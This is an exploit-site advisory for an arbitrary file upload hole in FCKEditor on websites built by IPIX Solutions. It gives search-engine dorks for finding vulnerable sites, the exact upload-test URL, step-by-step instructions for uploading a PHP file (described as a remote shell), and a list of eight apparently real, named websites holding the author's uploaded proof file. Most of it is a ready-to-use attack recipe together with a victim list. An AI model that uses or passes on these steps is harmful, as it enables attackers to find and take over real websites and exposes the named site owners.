Sites powered by IPIX Solutions suffer from a remote shell upload vulnerability. Note that this advisory has site-specific information.
9b23738a0172398b3d431ee607728720
#Exploit Title : IPIX Solutions (FCKEditor) File Upload Vulnerability
#Author : DevilScreaM
#Date : 14/09/2013
#Category : Web Applications
#Vendor : http://ipixsolutions.com
#Dork
intext:Powered By Ipix Solutions
intext:Powered By:IPIX SOLUTIONS
intext:Website Design @ IPIX Solutions.
#Vulnerability : Arbitrary File Upload Vulnerability
#Tested On : Windows 7/XP , Ubuntu (Mozila & Chrome)
#Greetz : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker
POC and Exploit
http://site-target/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
===================================================================================
1. At "Select the "File Uploader" to use" Change From ASP to PHP
2. Select Your File
3. Click Send it to Server, and waiting...
4. Result Upload At
http://site-target/userfiles/[YOUR_FILE.txt]
===================================================================================
Example
http://morisonmenonlimited.com/userfiles/devilscream.txt
http://smdentallab.org/userfiles/devilscream.txt
http://rklatex.com/userfiles/devilscream.txt
http://malabarholidays.com/userfiles/devilscream.txt
http://mimsindia.com/userfiles/devilscream.txt
http://stjosephstly.com/userfiles/devilscream.txt
http://memundahss.com/userfiles/devilscream.txt
http://novadenttly.com/userfiles/devilscream.txt
Comments
Subscribe to this comment feedNo comments yet, be the first!